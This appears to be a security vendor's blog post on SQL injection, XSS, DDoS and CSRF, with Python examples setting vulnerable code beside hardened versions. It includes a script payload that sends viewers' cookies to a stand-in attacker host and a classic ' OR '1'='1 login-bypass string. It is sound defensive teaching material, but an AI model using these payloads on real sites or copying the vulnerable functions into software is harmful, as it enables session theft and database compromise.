4 Common Web Application Security Attacks and What You can Do to Prevent Them
Anyone who operates a website should be concerned about security, especially the security of sensitive customer information. However, unless you follow security news closely, you tend to hear only about the most high-profile or sophisticated attacks. The reality is that common, unsophisticated attacks are run every single day against websites and web applications, often by automated tools. The good news is that these attacks are preventable with the right preparation.
What motivates hackers?
If you store sensitive user information in your database, users expect you to keep it confidential. Chances are that right at this moment someone is probing your website for a vulnerability to exploit. What are some of the motivations attackers might have?
- Financial gain – fraud, theft, and stealing personal information to sell
- Disruption – preventing other people from accessing systems, or distributing false information
- Notoriety – pulling off breaches that are extremely difficult, or getting into systems believed to be secure
What makes an application a target?
Different web applications have different functions and purposes, but any application can be a target for hackers. What makes an application a target?
- Popularity – If you have a popular website, you get a great number of visits every second. You probably have many competitors too, and damage to your brand can help a competitor. Your website's performance and availability is one of the main advantages you have over all the others. Attacks on popular websites also tend to be more newsworthy if the hacker is looking for notoriety.
- Protest/Politics – groups like Anonymous orchestrate attacks on government, religious and corporate websites for fun or to make a statement.
- Disgruntled employees – not all attacks come from outside; attacks are often orchestrated or assisted by somebody on the inside.
What are the 4 most common attacks?
Hackers have many attack vectors to choose from, but here are the 4 they most commonly try first:
- Carry out SQL injection attacks to gain access to the database, impersonate users, and destroy or alter data. SQL injection occurs when attacker-controlled input (form fields, but also URL parameters, cookies and headers) is concatenated into a SQL statement, so the database executes the attacker's text as part of the query. With SQL injection an attacker can change the price of a product, bypass a login, or read customer information such as credit card numbers, passwords (or their hashes) and contact details.
- Use Cross-Site Scripting (XSS) attacks to target other users of the website by injecting script into a page the application serves; the script then runs in every victim's browser with the privileges of your site. It can steal session cookies or other sensitive information, perform actions as the victim, send victims to malware, or even recruit their computers into large botnets.
- Make the site temporarily unavailable with a Distributed Denial of Service (DDoS) attack. DDoS attacks generate requests from thousands of IP addresses at once to flood a site with traffic until the server (or the network in front of it) can no longer answer legitimate requests. DDoS attacks can slow a site down or make it unavailable for as long as the flood lasts.
- Hijack trusted user sessions to make unwanted purchases or changes on behalf of users with Cross-Site Request Forgery (CSRF) attacks. CSRF occurs when a logged-in user is tricked into clicking a link or loading an attacker's page that silently sends a request to your site; the browser attaches the user's session cookie automatically, so your application treats the forged request as a deliberate action by that user.
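To make the XSS item concrete, here is an added example (not code from the original page or from Instart) of a comment-rendering function in its vulnerable and hardened forms, plus the response headers that limit the damage if an encoding bug slips through. The attacker comment, the `attacker.example` host and the `session` cookie name are constructed for the demonstration.

```python
import html

# Constructed attacker input (not from the page): a "comment" that, when rendered
# unescaped, sends the session cookie of every viewer to the attacker's host.
ATTACKER_COMMENT = (
    '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>'
)


def render_comment_unsafe(comment: str) -> str:
    """Vulnerable: user input is concatenated straight into the HTML, so a
    <script> tag in the comment runs in every other visitor's browser."""
    return f'<li class="comment">{comment}</li>'


def render_comment_safe(comment: str) -> str:
    """Hardened: HTML-encode the input at the point of output. The browser now
    shows the attacker's text literally instead of executing it."""
    return f'<li class="comment">{html.escape(comment, quote=True)}</li>'


def has_live_script(markup: str) -> bool:
    """Crude check used only by this demo: does a raw <script tag survive?"""
    return "<script" in markup.lower()


def security_headers(session_id: str) -> dict:
    """Defense-in-depth headers for the response that carries the comments.
    HttpOnly stops document.cookie from reading the session cookie, and the
    Content-Security-Policy blocks inline scripts and loads (including the
    exfiltration image above) from any origin but our own."""
    return {
        "Set-Cookie": f"session={session_id}; HttpOnly; Secure; SameSite=Lax; Path=/",
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
    }


if __name__ == "__main__":
    print(render_comment_unsafe(ATTACKER_COMMENT))  # script tag intact: executes in viewers' browsers
    print(render_comment_safe(ATTACKER_COMMENT))    # &lt;script&gt;...: shown as text
```

Escaping must happen for the context the data lands in (HTML body here; attribute, URL and JavaScript contexts need their own encoders), which is why template engines that auto-escape are preferable to hand-built strings.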
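The CSRF item above describes the attack but not the standard defense, a per-session anti-forgery token that the attacker's page cannot read. The following is an added example, not code from the original page or from Instart; the `handle_purchase` handler, the request dictionaries and the session identifier are hypothetical and constructed for the demonstration.

```python
import hashlib
import hmac
import secrets
from typing import Optional

# Assumption: a per-deployment secret that never leaves the server.
SERVER_SECRET = secrets.token_bytes(32)


def issue_csrf_token(session_id: str) -> str:
    """Token bound to the session: HMAC(secret, session_id). The site embeds it
    in its own forms; the same-origin policy keeps an attacker's page from
    reading it, so a forged request cannot carry the right value."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def csrf_token_valid(session_id: str, submitted: Optional[str]) -> bool:
    if not submitted:
        return False
    # Constant-time comparison so timing does not leak the expected token.
    return hmac.compare_digest(issue_csrf_token(session_id), submitted)


def handle_purchase(request: dict) -> str:
    """Hypothetical handler for POST /purchase. `request` is a constructed dict
    of the shape {"cookies": {...}, "form": {...}}."""
    session_id = request.get("cookies", {}).get("session")
    if session_id is None:
        return "401 not logged in"
    if not csrf_token_valid(session_id, request.get("form", {}).get("csrf_token")):
        return "403 CSRF check failed"
    item = request["form"].get("item", "?")
    return f"200 purchased {item}"


def demo():
    victim_session = "sess-7f3a"  # constructed session id
    # Request from the site's own form: carries the token rendered into that form.
    legit = {
        "cookies": {"session": victim_session},
        "form": {"item": "laptop", "csrf_token": issue_csrf_token(victim_session)},
    }
    # Request forged by a page the victim was tricked into loading: the browser
    # attaches the session cookie automatically, but the attacker cannot read
    # the victim's token, so the form has none (or only a guessed value).
    forged = {"cookies": {"session": victim_session}, "form": {"item": "laptop"}}
    guessed = {
        "cookies": {"session": victim_session},
        "form": {"item": "laptop", "csrf_token": "0" * 64},
    }
    return handle_purchase(legit), handle_purchase(forged), handle_purchase(guessed)


if __name__ == "__main__":
    print(demo())  # ('200 purchased laptop', '403 CSRF check failed', '403 CSRF check failed')
```

Two cheap extra layers belong alongside the token: accept state-changing actions only on POST (never on a GET that a link or image tag can trigger), and set `SameSite=Lax` or `Strict` on the session cookie so the browser withholds it from cross-site requests in the first place.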
How should you protect your assets and users?
There are different methods and tools that modern web application developers use to protect their websites. Some solutions address specific attacks; others are best practices that should be applied on an ongoing basis to protect your applications and users. Code reviews, bug bounty programs and code scanners should be used throughout the application lifecycle. Code reviews can catch vulnerable code early in development, static and dynamic scanners check for vulnerabilities automatically, and bug bounty programs give external security researchers an incentive to find and report bugs in your website.
Even with these best practices in place, you may still find yourself under attack.
Attack-specific solutions include:
- Using prepared statements with parameterized queries. The query structure is sent to the database first and the user-supplied values are bound to placeholders afterwards, so the database always knows which part is SQL code and which part is data. An attacker's input is then only ever data: it cannot change the shape of the query, which defeats SQL injection.
- Implementing bot detection and mitigation so that automated traffic is identified and throttled or blocked before it reaches your application. This helps ensure that a form submission or request actually comes from a human and not a bot impersonating one, and it blunts floods of automated requests.
- Using a Web Application Firewall (WAF) to inspect incoming HTTP traffic and block requests that match known attack patterns. A WAF is a filter in front of the application, not a fix for vulnerable code: attackers routinely craft payloads that slip past signatures, so treat it as an additional layer rather than a replacement for secure coding.
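The following added example (not code from the original page or from Instart) ties the SQL injection item in the attack list to the parameterized-query item above: the same login check written with string concatenation and with bound parameters, run against a constructed in-memory SQLite table. The table, the users and the classic `' OR '1'='1` payload are constructed for the demonstration.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: two users with (already hashed) passwords."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (username TEXT, password_hash TEXT, card_last4 TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "hash-a", "4242"), ("bob", "hash-b", "1111")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password_hash: str) -> list:
    """Vulnerable: user input is pasted into the SQL text, so quotes in the
    input end the string literal and the rest is executed as SQL."""
    sql = (
        "SELECT username FROM users "
        f"WHERE username = '{username}' AND password_hash = '{password_hash}'"
    )
    return [row[0] for row in conn.execute(sql)]


def login_parameterized(conn: sqlite3.Connection, username: str, password_hash: str) -> list:
    """Hardened: the statement is fixed, the values are bound separately, so the
    database never parses the input as SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password_hash = ?"
    return [row[0] for row in conn.execute(sql, (username, password_hash))]


# Classic injection payload. In the vulnerable query it becomes
#   WHERE username = '' OR '1'='1' AND password_hash = '' OR '1'='1'
# which is true for every row, so the check matches all users.
PAYLOAD = "' OR '1'='1"


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, PAYLOAD, PAYLOAD))      # ['alice', 'bob']: login bypassed
    print(login_parameterized(db, PAYLOAD, PAYLOAD))   # []: payload treated as a literal username
    print(login_parameterized(db, "alice", "hash-a"))  # ['alice']
```

The `?` placeholder is SQLite's; other drivers use `%s`, `$1` or `:name`, but the principle is the same, and it extends to any statement the application builds, including the `UPDATE` that sets a product's price.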
None of these methods can replace the others – it is important to follow the ‘defense in depth’ methodology and deploy many independent, overlapping layers of security. Although no system can be completely safe, being prepared for the most common types of attacks should be a bare minimum for your organization. For more help and information on securing your websites and applications from all types of attacks, please feel free to contact us. Instart provides comprehensive application protection for your cloud, web, and mobile applications.